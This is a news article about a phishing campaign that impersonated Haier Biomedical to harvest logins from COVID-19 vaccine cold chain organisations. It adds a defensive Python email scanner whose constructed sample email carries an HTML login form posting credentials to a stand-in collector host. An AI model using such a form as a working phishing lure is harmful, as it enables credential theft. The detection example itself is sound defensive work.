Although many public and business entities across the globe may already be on the verge of creating an effective COVID-19 vaccine, they also need to figure out how to deal with the logistical challenge of keeping doses at freezing temperatures throughout supply chain distribution. On top of everything else, COVID-19 cold chain developers have become the target of a new cyberattack designed to harvest login credentials for potential future benefit. The attack, a phishing email campaign currently unfolding in Western Europe, South Korea, and Taiwan, aims to strike organizations presently focused on inventing the technology that would allow COVID-19 vaccines to retain their potency throughout the entire supply chain cycle. Although security analysts have yet to reveal the real culprit, they speculate that it may be a state-backed undertaking.
A CCEOP-Related Affair
Disguised as simple quotation requests, the phishing emails arrived with HTML-coded tools that prompted recipients to submit their login credentials. The messages looked as though they were coming from Haier Biomedical, a renowned cold chain service provider. In reality, they sought to harvest login credentials and potentially use those to acquire administrator access to COVID-19 vaccine distribution and other sensitive data in due course.
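As an added example (not taken from the campaign or from any vendor's tooling), a mail-gateway style check for this pattern could flag any HTML part that contains a password field and report where its form would send the data. It assumes the "HTML-coded tools" arrive as HTML attachments or body parts; the addresses, file name, and domains in the sample are constructed.

```python
from email.message import EmailMessage
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

class CredentialFormFinder(HTMLParser):
    """Records the form action in effect for every password field seen."""
    def __init__(self):
        super().__init__()
        self.action = ""   # action of the form currently open, if any
        self.hits = []     # one entry per password input

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.action = a.get("action") or ""
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.hits.append(self.action)

    def handle_endtag(self, tag):
        if tag == "form":
            self.action = ""

def scan_message(msg):
    """Return one finding per password field found in an HTML part of msg."""
    sender_domain = parseaddr(msg["From"] or "")[1].rpartition("@")[2].lower()
    findings = []
    for part in msg.walk():
        name = part.get_filename() or ""
        is_html = (part.get_content_type() == "text/html"
                   or name.lower().endswith((".html", ".htm")))
        if part.is_multipart() or not is_html:
            continue
        raw = part.get_payload(decode=True) or b""
        finder = CredentialFormFinder()
        finder.feed(raw.decode(part.get_content_charset() or "utf-8", "replace"))
        for action in finder.hits:
            host = urlparse(action).hostname or ""
            same = host == sender_domain or host.endswith("." + sender_domain)
            # off_domain: the form posts to a host unrelated to the sender
            findings.append({"file": name, "post_host": host,
                             "off_domain": bool(host) and not same})
    return findings

def build_sample():
    """Constructed quotation-request email with an HTML login form attached."""
    msg = EmailMessage()
    msg["From"] = "Sales <sales@supplier.example>"
    msg["To"] = "procurement@recipient.example"
    msg["Subject"] = "Request for quotation"
    msg.set_content("Please see the attached quotation request.")
    html = ('<html><body><form action="https://collector.example/submit" method="post">'
            '<input type="text" name="user"><input type="password" name="pass">'
            '</form></body></html>')
    msg.add_attachment(html, subtype="html", filename="RFQ.html")
    return msg
```

A finding with `off_domain` set is a candidate for quarantine or analyst review; a legitimate quotation request has little reason to carry a login form at all.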
The phishing campaign's focal point is companies and organizations that utilize the Cold Chain Equipment Optimization Platform (CCEOP). Developed by the Gavi Vaccine Alliance, CCEOP seeks to help businesses create the technology required to transport vaccines at ultracold temperatures. At present, cold chain transportation is a topic of vested interest for a large number of companies across the entire economic spectrum. What is more, the list of entities associated with CCEOP is long enough to include high-profile international players such as the EU's Directorate-General for Taxation and Customs Union.
Not a Hacker But a State?
It's not yet evident who embarked on this campaign. Considering its large scale, meticulous execution, and lack of apparent monetary benefit, researchers believe that the attack may be an espionage campaign sanctioned at a government level. Now that dozens of countries are racing against time to come up with a robust and fully working remedy for COVID-19, some players may find it hard to resist the lure of peeping into how far the competition may have gone. Bearing in mind that incessant cyberattacks have marred COVID-19-related R&D from the outset, such an assumption may not be far from the truth.